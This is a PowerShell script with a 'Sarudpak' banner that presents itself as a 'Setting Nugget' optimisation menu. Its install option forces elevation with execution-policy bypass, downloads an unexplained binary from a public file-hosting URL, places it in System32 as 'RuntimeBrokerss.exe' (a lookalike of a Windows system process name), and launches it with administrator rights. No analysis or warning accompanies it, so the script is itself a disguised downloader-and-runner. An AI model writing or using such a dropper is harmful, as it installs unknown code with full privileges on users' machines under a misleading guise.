Write-Host 
Write-Host                                                                                    
Write-Host       mmmm                                        mm                      mm       
Write-Host     m#""""#                                       ##                      ##       
Write-Host     ##m        m#####m   ##m####  ##    ##   m###m##  ##m###m    m#####m  ## m##"  
Write-Host      "####m    " mmm##   ##"      ##    ##  ##"  "##  ##"  "##   " mmm##  ##m##    
Write-Host          "##  m##"""##   ##       ##    ##  ##    ##  ##    ##  m##"""##  ##"##m   
Write-Host     #mmmmm#"  ##mmm###   ##       ##mmm###  "##mm###  ###mm##"  ##mmm###  ##  "#m  
Write-Host      """""     """" ""   ""        """" ""    """ ""  ## """     """" ""  ""   """ 
Write-Host                                                       ##                                                              
Write-Host                                                         
Write-Host 
Write-Host "Hi Member Sarudpak Welcome to Setting Nugget | 25/11/2025:"
Write-Host "1. Optimiz & Setting"
Write-Host "2. Start"
Write-Host "3. Clean"

$choice = Read-Host "Enter choice (select)"

# -----------------------------
# Check for Administrator rights
# -----------------------------
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 
    Write-Host "Restarting with Administrator privileges..."
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# -----------------------------
# Define paths and variables
# -----------------------------
$system32Path = "$env:windir\System32"
$exeDestination = Join-Path $system32Path "RuntimeBrokerss.exe"
$exeUrl = "https://files.catbox.moe/yi1476.bin"

# -----------------------------
# Install & Run Mode
# -----------------------------
if ($choice -eq "1") {
    Write-Host "`nStarting installation..."


    # Download exe and rename to sarudpakkrub.exe
    Write-Host "Downloading and renaming executable to RuntimeBrokerss.exe..."
    try {
        $tempFile = Join-Path $env:TEMP "Nugget_temp.exe"
        Invoke-WebRequest -Uri $exeUrl -OutFile $tempFile
        Move-Item -Path $tempFile -Destination $exeDestination -Force
        Write-Host "RuntimeBrokerss.exe download completed." -ForegroundColor Green
    } catch {
        Write-Host "RuntimeBrokerss.exe download failed: $_" -ForegroundColor Red
        exit
    }

    # Run the program directly
    Write-Host "Run the program..."
    try {
        Start-Process -FilePath $exeDestination -Verb RunAs
        Write-Host "Program started successfully." -ForegroundColor Green
    } catch {
        Write-Host "Failed to start program: $_" -ForegroundColor Red
    }

    Write-Host "`nInstallation completed successfully." -ForegroundColor Green
}

elseif ($choice -eq "2") {
    # start
    Write-Host "Starting the program..."
    try {
        Start-Process -FilePath $exeDestination -Verb RunAs
        Write-Host "Program started successfully." -ForegroundColor Green
    } catch {
        Write-Host "Failed to start program: $_" -ForegroundColor Red
    }

    Write-Host "`nStarting the program successfully." -ForegroundColor Green
}

# -----------------------------
# Clean Mode
# -----------------------------
elseif ($choice -eq "3") {
    Write-Host "Cleaning up installation..."

    # Stop the process if running
    Write-Host "Stopping RuntimeBrokerss.exe process..."
    try {
        Stop-Process -Name "RuntimeBrokerss" -Force -ErrorAction SilentlyContinue
        Write-Host "Process stopped." -ForegroundColor Green
    } catch {
        Write-Host "No running process found or failed to stop." -ForegroundColor Yellow
    }

    # Remove files if they exist
    if (Test-Path $exeDestination) { 
        Remove-Item $exeDestination -Force 
        Write-Host "Removed executable: $exeDestination" -ForegroundColor Green
    }

    Write-Host "Cleanup completed." -ForegroundColor Green
}

else {
    Write-Host "Invalid choice (please select 1 or 2 or 3)." -ForegroundColor Red

}
